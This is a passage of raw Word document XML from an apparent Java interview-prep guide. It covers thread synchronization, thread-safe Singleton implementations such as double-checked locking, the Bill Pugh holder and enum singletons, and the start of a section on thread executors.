      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Monitor</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The object used to synchronize code is often referred to as a </w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>monitor</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Each object can be considered as a monitor, and only one thread can hold the monitor (lock) at a time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5597C0CB"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Reentrant Locks</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Java allows threads to re-enter a synchronized block or method. For example, if a thread has already acquired a lock on an object, it can enter other synchronized blocks (or methods) without deadlocking itself. This is called </w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reentrancy</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CC1ADE"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Deadlock</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Performance Impact</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Example of Synchronized Methods:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D1811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BankAccount {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5324F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balance = 1000;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BD824D" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F3C9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only one thread can withdraw at a time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C9C2E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withdraw(int amount) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E45C65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if (balance &gt;= amount) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D6F5F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Withdrawing: " + amount);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A5B51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lance -= amount;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A219A2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System.out.println("Balance after withdrawal: " + balance);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2622F59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else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2633DF7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Insufficient balance!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F10DAF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4ADA79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037F5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37D4A9" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62E644D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SynchronizedDemo {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36ECBAA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ain(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C1C03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nkAccount account = new BankAccount();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF790C9" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D7A5F9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eate two threads trying to access the synchronized method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB0EA6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1 = new Thread(() -&gt; account.withdraw(500));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001D827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2 = new Thread(() -&gt; account.withdraw(700));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07237557" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7659371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1.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A437B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2.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F9D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A0A20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19AD29C" w14:textId="77777777" w:rsidR="00326C8F" w:rsidRPr="00414276" w:rsidRDefault="00326C8F" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1243"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>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 of Synchronization in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B272629"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Purpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: To ensure thread safety and prevent inconsistent data when multiple threads access shared resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77EFA77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Methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Achieved through synchronized methods, synchronized blocks, and using locks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF97A3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Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Should be used carefully to avoid performance bottlenecks and deadlocks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D384E6"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Alternatives</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Java provides ReentrantLock (for more advanced locking features) and other concurrency utilities in java.util.concurrent package to manage thread synchronization more flexibly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B1E026" w14:textId="70188081"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1" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="77798468" w14:textId="77777777" w:rsidR="00690065" w:rsidRPr="00CE4B95" w:rsidRDefault="00690065">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="302" w:name="_Toc197867516"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Thread safety with Singleton class?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="302"/>
    </w:p>
    <w:p w14:paraId="4C4FA19A" w14:textId="3E8E5480" w:rsidR="000C2CDB" w:rsidRPr="00414276" w:rsidRDefault="000C2CDB"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nsuring </w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>thread safety</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a </w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Singleton class</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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hread Safety in Singleton Class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7262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ager Initialization (Thread-safe)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A111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2BEA533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Eager initialization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5787737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0266950D" w14:textId="77777777" w:rsidR="000C2CDB" w:rsidRPr="00414276" w:rsidRDefault="000C2CDB" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3470B2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28BC43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26F4998D" w14:textId="77777777" w:rsidR="000C2CDB" w:rsidRPr="00414276" w:rsidRDefault="000C2CDB" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10B388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get the instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529973C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63FB2DD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3619C8A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6336FB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E513FB4"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Advantages</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Simple, no need for synchronization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E05CB23"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The instance is created even if it is never used, which could be inefficient if the object is heavy to create and is not always needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4EC306"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azy Initialization (Not Thread-Safe)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9C97B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lazy initialization, the Singleton instance is created only when it is needed (i.e., when getInstance() is called). However, this method is </w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not thread-safe</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a multithreaded environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71744B5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157A89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1908C879" w14:textId="77777777" w:rsidR="000C2CDB" w:rsidRPr="00414276" w:rsidRDefault="000C2CDB" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00FF78D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3CC84E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3812C0B3" w14:textId="77777777" w:rsidR="000C2CDB" w:rsidRPr="00414276" w:rsidRDefault="000C2CDB" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="427755D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Not thread-safe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7725DA0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0229F0C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1E059DD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 // Potential thread safety issue here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5884FB6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AD750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196FB33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3AE96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818B7AD" w14:textId="77777777" w:rsidR="000C2CDB" w:rsidRPr="00414276" w:rsidRDefault="000C2CDB" w:rsidP="00414276">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="124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If multiple threads call getInstance() at the same time, it may lead to multiple instances being created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374B19FA"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Safe Singleton using Synchronized Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5730532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the Singleton thread-safe with lazy initialization, you can synchronize the getInstance() method. However, this may introduce performance overhead due to synchronization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F2D60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4608F89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6134DDF7" w14:textId="77777777" w:rsidR="000C2CDB" w:rsidRPr="00414276" w:rsidRDefault="000C2CDB" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="443440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2392745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44868001" w14:textId="77777777" w:rsidR="000C2CDB" w:rsidRPr="00414276" w:rsidRDefault="000C2CDB" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76E981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read-safe but inefficient due to synchronization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772D197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ynchronized Singleton getInstance() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1836873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7EEEA14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23AEC9A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7B255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26548FB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51A24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70233E6"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 Thread-safe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8DC238"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Synchronizing the method may lead to performance bottlenecks because every time getInstance() is called, the synchronization mechanism will be invoked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6092A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Double-Checked Locking (Thread-Safe and Efficient)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E6958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6D5996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volatile Singleton instance;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21001A47" w14:textId="77777777" w:rsidR="000C2CDB" w:rsidRPr="00414276" w:rsidRDefault="000C2CDB" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BFCEC5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5103713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0C1B19E2" w14:textId="77777777" w:rsidR="000C2CDB" w:rsidRPr="00414276" w:rsidRDefault="000C2CDB" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06BCB0D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Double-checked locking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD91BB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1709461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59D308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nchronized (Singleton.class) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF11B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if (instance == null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA8AA34"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749661D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8350E0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66761E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722D7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4EC325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79B76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B7E0DD6"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DE5AAA6"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 better performance compared to synchronized methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED08F53"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nsures the instance is created only when needed, avoiding the overhead of synchronization after the instance is created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32174802"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42323AEF"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use of volatile is required to ensure that the instance is visible to all threads, and this pattern can be slightly more complex to implement correctly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0BC43C"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Bill Pugh Singleton Design (Thread-Safe and Efficient)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A73EA5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is method leverages the </w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java class loading mechanism</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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53065F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3686B3C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68AADBF0" w14:textId="77777777" w:rsidR="000C2CDB" w:rsidRPr="00414276" w:rsidRDefault="000C2CDB" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DC4647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Inner static helper class that contains the Singleton instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724E569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class SingletonHelper {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425C84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e Singleton instance is created when the class is loaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7266EFA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720471F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94250F" w14:textId="77777777" w:rsidR="000C2CDB" w:rsidRPr="00414276" w:rsidRDefault="000C2CDB" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="615E89B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access the Singleton instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D50B9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422A73D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SingletonHelper.instance;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AB3D6C"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160572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7FCB4B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34AD646A"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out synchronization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF1F645"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and elegant, with no performance overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F81A503"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instance is created when the SingletonHelper class is loaded, not before, making it lazy-loaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA425F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this is considered the most efficient and recommended way to implement the Singleton pattern in Java.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0350CE8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Enum-based Singleton (Thread-Safe and Robust)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0F85B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Java's </w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>enum type</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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enum Singleton {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020880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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B46E894" w14:textId="77777777" w:rsidR="000C2CDB" w:rsidRPr="00414276" w:rsidRDefault="000C2CDB" w:rsidP="00414276">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A553F8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Any methods or variables can be added here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0371D1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doSomething() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408A066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Singleton instance method called");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A23827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F50F72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02690E6"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291997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and you do not need to worry about synchronization or locking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B8BF1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ava Enum guarantees that only one instance is created, and it's handled by the Java Virtual Machine (JVM).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6886FDC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implest implementation and immune to serialization issues that can affect other Singleton approaches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC21515"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it's the most reliable and straightforward Singleton implementation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AF880B"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1E02D76E"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ager Initialization</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Suitable when the instance creation is lightweight and the instance is always needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0F4ABC"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azy Initialization</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Can be used but requires synchronization to ensure thread safety.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB2FBD7"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ouble-Checked Locking</w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: More efficient than synchronized methods and is the recommended approach for most cases where the Singleton instance needs to be created lazily.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C745685"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Simple, efficient, and thread-safe. Ideal for use when you need a thread-safe Singleton.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16283058"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The most robust and simplest way to implement a Singleton in Java. It handles all the edge cases and is inherently thread-safe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED3558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ach of these approaches has its own use cases, but generally, </w:t>
      </w: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xml:space="preserve"> and </w:t>
      </w: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xml:space="preserve"> are the preferred methods in modern Java.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD7915A" w14:textId="5040CEFE"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2" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3D4899" w14:textId="77777777" w:rsidR="002A196E" w:rsidRPr="00CE4B95" w:rsidRDefault="002A196E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="303" w:name="_Toc197867517"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Thread executors?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="303"/>
    </w:p>
    <w:p w14:paraId="01DD982A" w14:textId="48A97AE6" w:rsidR="00761FB8" w:rsidRPr="00414276" w:rsidRDefault="00761FB8"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Java, </w:t>
      </w:r>
      <w:r w:rsidRPr="00414276">
        <w:rPr>
